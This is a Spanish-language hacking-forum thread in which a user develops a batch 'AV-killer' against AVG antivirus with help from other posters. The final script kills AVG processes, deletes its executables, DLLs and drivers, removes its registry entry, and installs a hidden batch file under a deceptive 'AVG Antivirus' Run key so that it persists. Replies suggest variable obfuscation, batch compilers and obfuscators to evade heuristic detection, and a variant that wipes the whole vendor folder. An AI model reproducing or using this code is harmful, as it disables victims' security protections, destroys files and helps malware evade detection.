Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: Carloswaldo en 10 Mayo 2008, 21:51 pm


Título: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 10 Mayo 2008, 21:51 pm
Estoy empezando en batch y escribí el código de un av-killer muy simple :xD

Ahí está:

Código:
@echo off
taskkill /f /im avgamsvr.exe
taskkill /f /im avgcc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgupsvc.exe
cd %programfiles%\Grisoft\AVG7
del *.exe
exit

Bueno, la cosa es que el avg me lo detecta y me niega el acceso al archivo (ni siquiera para editarlo). He probado con un .bat compiler, pero lo que hace es un .exe que crea el .bat en una carpeta temporal y lo ejecuta, con lo que obviamente el avg lo detecta al tiempo de la ejecución.

¿Hay alguna forma de mejorar el código de forma que no lo detecte el avg?
Graciasssss....

Carloswaldo :)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Freeze. en 10 Mayo 2008, 21:58 pm
Puedes mirar aca talvez:
http://foro.elhacker.net/scripting/batch_file_creator_generador_de_archivos_binarios_con_batch-t147020.0.html

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 10 Mayo 2008, 21:59 pm
Podes usar un mejor compilador para tus batch (sugiero el Quick Batch File Compiler, tratá de obtenerlo full versión) o sino borrale estas lines :
Código:
cd %programfiles%\Grisoft\AVG7
del *.exe
Que son las que hacen que salte el av (creo)

Espero que te sirva ;)

PD: Usas el AVG ???  :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Freeze. en 10 Mayo 2008, 22:01 pm
Ese que recomiendas es muy bueno ;) Te lo re-recomiendo :xD

Te recomiendo un par: Sera trio :xD

Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal :P

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 10 Mayo 2008, 22:02 pm
Un par se utiliza tambien para enlistar varios elementos (2 o más)

Citar
Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal tongue

Lo del cd estaría de más si se borrase la linea del comando del, asi que la incluí para que la borre  :rolleyes:

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 11 Mayo 2008, 20:10 pm
Estaré probando el quick batch compiler

Cita de: ^Arkangel^ en 10 Mayo 2008, 21:59 pm
PD: Usas el AVG ???  :-\ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)

Gracias por las sugerencias pero prefiero el avg por experiencias propias.

Por cierto, si yo mato esos procesos manualmente e intento abrir mi archivo .bat, me sale "Acceso Denegado", lo que sospecho es que algún servicio del avg sigue activo, alguna idea de como saber cuales son todos los procesos que utiliza el avg?

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 11 Mayo 2008, 20:44 pm
Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

Un saludo ;)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 11 Mayo 2008, 20:54 pm
Cita de: ^Arkangel^ en 11 Mayo 2008, 20:44 pm
Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

OBVIO, pero como se yo cuales son. :¬¬

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Freeze. en 11 Mayo 2008, 20:55 pm
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO :xD

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 11 Mayo 2008, 21:12 pm
Qué? y eso como se ve?

Por cierto con el Qbc me va de lujo, pero cuando quiero ejecutar el ejecutable a partir del codigo anterior no hace absolutamente nada como gosth aplication, si lo pongo en modo consola me sale en una linea "Acceso Denegado", sin embargo el exe no es detectado por el avg. :-\ Ideas?

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Sai-To en 11 Mayo 2008, 22:15 pm
trata de cifrar! ;) set va = blablabla...

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 11 Mayo 2008, 22:46 pm
Cita de: brache en 11 Mayo 2008, 22:15 pm
trata de cifrar! ;) set va = blablabla...

Wiiiiiiiiiiiiiiiiiiiiiiiiii ;D ;D ;D ;D ;D ;D ;D ;D ;D

Avg matado, a por el proximo av ::)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 12 Mayo 2008, 03:00 am
Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 12 Mayo 2008, 03:39 am
Cita de: Carloswaldo en 12 Mayo 2008, 03:00 am
Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?

Mirando en el administrador de Tareas  :rolleyes:

Cita de: Carloswaldo
OBVIO, pero como se yo cuales son.

Cita de: Freeze.
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO

 :rolleyes:

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 12 Mayo 2008, 04:08 am
Si ya no hay ningún ejecutable porque se borraron todos. :xD

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 12 Mayo 2008, 06:29 am
Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro :(

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Freeze. en 12 Mayo 2008, 19:34 pm
Estuve un buen tiempo - ahora que recuerdo - tratando de matar al AVG desde  VB y no pude porque no podia desactivar servicios o algo asi :P

Así que podrias comenzar con otro AV más facil o menos dificil ;) Como el panda o el avast ;)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 12 Mayo 2008, 21:23 pm
el avast no es malo ^^

te recomiendo el panda antes que el avast  ;)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 12 Mayo 2008, 21:57 pm
Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...

No me rendiré ahora que he llegado "tan" lejos... :xD :xD

Carloswaldo :(

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 12 Mayo 2008, 23:51 pm
He estado investigando.

Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:

avgse.dll

Esto es lo que encontre en internet:

Citar
Description: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.

Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?

Ahí está mi codigo:

Código:
@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 13 Mayo 2008, 00:12 am
Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:

Código:
set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%

Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?

Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Darioxhcx en 13 Mayo 2008, 00:23 am
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

podrias probarlo asi tmb
saludos

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Hendrix en 13 Mayo 2008, 00:28 am
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 13 Mayo 2008, 00:35 am
Cita de: Darioxhcx en 13 Mayo 2008, 00:23 am
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.

Cita de: Hendriҳ en 13 Mayo 2008, 00:28 am
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)

Excelente, no lo había visto, lo estaré probando. Gracias :D

Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro :xD

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: MK-Ultra en 13 Mayo 2008, 02:31 am
Cita de: Carloswaldo en 13 Mayo 2008, 00:35 am
Uso el Quick Batch file compiler

Bien ahí  ;)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Carloswaldo en 13 Mayo 2008, 21:46 pm
Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers.

Este es el código final:

Código:
::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit

Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo. ;D

Estaré buscando la forma de mejorar el código, e iré por el próximo av... ::)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: $hyDow en 29 Mayo 2008, 00:38 am
no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%

digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...

$hyDow

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: Sai-To en 29 Mayo 2008, 02:29 am
bueno si no te quieres complicar la vida poniendo como un becerro:

set var=...............
...................

hay crearon una utilidad para separarlo asi... la postee yo de skull! ;) y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! ;)

Título: Re: Que no detecten mi av-killer hecho en batch...
Publicado por: $hyDow en 29 Mayo 2008, 20:09 pm
hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi


$hyDow


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines